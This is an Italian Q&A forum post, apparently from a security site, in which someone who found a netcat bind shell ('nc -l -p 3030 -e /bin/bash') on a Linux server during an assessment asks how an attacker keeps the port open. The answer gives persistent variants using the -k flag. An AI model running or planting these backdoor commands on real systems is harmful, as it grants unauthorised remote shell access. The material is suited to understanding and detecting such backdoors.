Ho trovato il seguente comando più volte in uno dei server linux durante una valutazione:
nc -l -p 3030 -e /bin/bash
Ciò consente a un hacker di ottenere il controllo su questo livello tramite bash. Provandolo, mi sono reso conto che ogni volta che il client interrompe la connessione, la porta viene nuovamente chiusa.
C'è un modo per l'hacker di tenere questa porta aperta in modo permanente?
Nc con l'opzione -k ti aiuterà.
nc -l -k -p 3030 -e /bin/bash
nc -l -k -p 3030 | /bin/bash
Forza nc a rimanere in attesa di un'altra connessione dopo che la connessione corrente è stata completata. È un errore utilizzare questa opzione senza l'opzione -l . Se utilizzato insieme all'opzione -u , il socket del server non è connesso e può ricevere datagrammi UDP da più host.
Leggi altre domande sui tag backdoor network-scanners netcat